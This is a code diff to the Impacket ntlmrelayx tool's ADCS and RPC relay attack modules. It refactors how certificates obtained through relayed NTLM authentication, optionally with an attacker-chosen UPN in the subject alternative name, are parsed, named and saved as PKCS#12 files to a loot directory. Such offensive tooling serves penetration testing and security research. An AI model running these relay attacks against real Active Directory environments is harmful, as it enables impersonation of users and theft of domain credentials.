diff --git a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py index ce7e7ba53..27cb78414 100644 --- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py +++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py @@ -20,9 +20,11 @@ import os from OpenSSL import crypto +from cryptography import x509 from cryptography.hazmat.primitives.serialization import pkcs12 from cryptography.hazmat.primitives.serialization import NoEncryption -from cryptography.x509 import load_pem_x509_certificate, load_der_x509_certificate +from cryptography.x509 import ExtensionNotFound, load_pem_x509_certificate +from cryptography.x509.oid import NameOID, ObjectIdentifier from cryptography.hazmat.backends import default_backend @@ -34,6 +36,7 @@ class ADCSAttack: + UPN_OID = ObjectIdentifier("1.3.6.1.4.1.311.20.2.3") def _run(self): key = crypto.PKey() @@ -85,17 +88,20 @@ def _run(self): LOG.info("GOT CERTIFICATE! ID %s" % certificate_id) certificate = response.read().decode() - certificate_store = self.generate_pfx(key.to_cryptography_key(), certificate) - LOG.info("Writing PKCS#12 certificate to %s/%s.pfx" % (self.config.lootdir, self.username)) + cert_obj = load_pem_x509_certificate(certificate.encode(), backend=default_backend()) + pfx_filename = self._sanitize_filename(self.username or self._extract_certificate_identity(cert_obj) or "certificate_{0}".format(certificate_id)) + certificate_store = self.generate_pfx(key.to_cryptography_key(), cert_obj) + output_path = os.path.join(self.config.lootdir, "{}.pfx".format(pfx_filename)) + LOG.info("Writing PKCS#12 certificate to %s" % output_path) try: if not os.path.isdir(self.config.lootdir): os.mkdir(self.config.lootdir) - with open("%s/%s.pfx" % (self.config.lootdir, self.username), 'wb') as f: + with open(output_path, 'wb') as f: f.write(certificate_store) LOG.info("Certificate successfully written to file") except Exception as e: LOG.info("Unable to write certificate to file, printing B64 of certificate to console instead") - LOG.info("Base64-encoded PKCS#12 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode())) + LOG.info("Base64-encoded PKCS#12 certificate (%s): \n%s" % (pfx_filename, base64.b64encode(certificate_store).decode())) pass if self.config.altName: @@ -105,29 +111,24 @@ def _run(self): def generate_csr(key, CN, altName, csr_type = crypto.FILETYPE_PEM): LOG.info("Generating CSR...") req = crypto.X509Req() - req.get_subject().CN = CN + + if CN: + req.get_subject().CN = CN if altName: req.add_extensions([crypto.X509Extension(b"subjectAltName", False, b"otherName:1.3.6.1.4.1.311.20.2.3;UTF8:%b" % altName.encode() )]) - req.set_pubkey(key) req.sign(key, "sha256") return crypto.dump_certificate_request(csr_type, req) @staticmethod - def generate_pfx(key, certificate, cert_type=crypto.FILETYPE_PEM): - - if cert_type == crypto.FILETYPE_PEM: - cert=load_pem_x509_certificate(certificate.encode(), backend=default_backend()) - else: #ASN1/DER - cert=load_der_x509_certificate(certificate.encode(), backend=default_backend()) - + def generate_pfx(key, certificate): pfx_data = pkcs12.serialize_key_and_certificates( name=b"", key=key, - cert=cert, + cert=certificate, cas=None, encryption_algorithm=NoEncryption() ) @@ -139,3 +140,42 @@ def generate_certattributes(template, altName): if altName: return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName) return "CertificateTemplate:{}".format(template) + + @classmethod + def _extract_certificate_identity(cls, cert): + try: + common_names = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME) + for attribute in common_names: + value = attribute.value.strip() + if value: + return value + except Exception: + pass + + try: + san_extension = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName) + san = san_extension.value + for other_name in san.get_values_for_type(x509.OtherName): + if other_name.type_id == cls.UPN_OID: + value = other_name.value + if isinstance(value, bytes): + value = value.decode('utf-8', errors='ignore') + value = value.strip() + if value: + return value + for dns_name in san.get_values_for_type(x509.DNSName): + value = dns_name.strip() + if value: + return value + except ExtensionNotFound: + pass + except Exception: + pass + + return None + + @staticmethod + def _sanitize_filename(name): + sanitized = re.sub(r'[^A-Za-z0-9._-]', '_', name) + sanitized = sanitized.strip("._") + return sanitized diff --git a/impacket/examples/ntlmrelayx/attacks/rpcattack.py b/impacket/examples/ntlmrelayx/attacks/rpcattack.py index ca66633f5..3ec88297b 100644 --- a/impacket/examples/ntlmrelayx/attacks/rpcattack.py +++ b/impacket/examples/ntlmrelayx/attacks/rpcattack.py @@ -20,6 +20,8 @@ import random from OpenSSL import crypto +from cryptography.x509 import load_der_x509_certificate +from cryptography.hazmat.backends import default_backend from impacket import LOG from impacket.dcerpc.v5 import tsch, icpr @@ -156,19 +158,25 @@ def _run(self): ELEVATED.append(self.username) - certificate_store = ADCSAttack.generate_pfx(key, certificate, crypto.FILETYPE_ASN1) - LOG.info("Writing PKCS#12 certificate to %s/%s.pfx" % (self.config.lootdir, self.username)) + cert_obj = load_der_x509_certificate(certificate, backend=default_backend()) + pfx_filename = ADCSAttack._sanitize_filename(self.username or ADCSAttack._extract_certificate_identity(cert_obj) or "certificate") + certificate_store = ADCSAttack.generate_pfx(key.to_cryptography_key(), cert_obj) + output_path = os.path.join(self.config.lootdir, "{}.pfx".format(pfx_filename)) + LOG.info("Writing PKCS#12 certificate to %s" % output_path) try: if not os.path.isdir(self.config.lootdir): os.mkdir(self.config.lootdir) - with open("%s/%s.pfx" % (self.config.lootdir, self.username), 'wb') as f: + with open(output_path, 'wb') as f: f.write(certificate_store) LOG.info("Certificate successfully written to file") except Exception as e: LOG.info("Unable to write certificate to file, printing B64 of certificate to console instead") - LOG.info("Base64-encoded PKCS#12 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode())) + LOG.info("Base64-encoded PKCS#12 certificate (%s): \n%s" % (pfx_filename, base64.b64encode(certificate_store).decode())) pass + if self.config.altName: + LOG.info("This certificate can also be used for user : {}".format(self.config.altName)) + class RPCAttack(ProtocolAttack, TSCHRPCAttack): PLUGIN_NAMES = ["RPC"]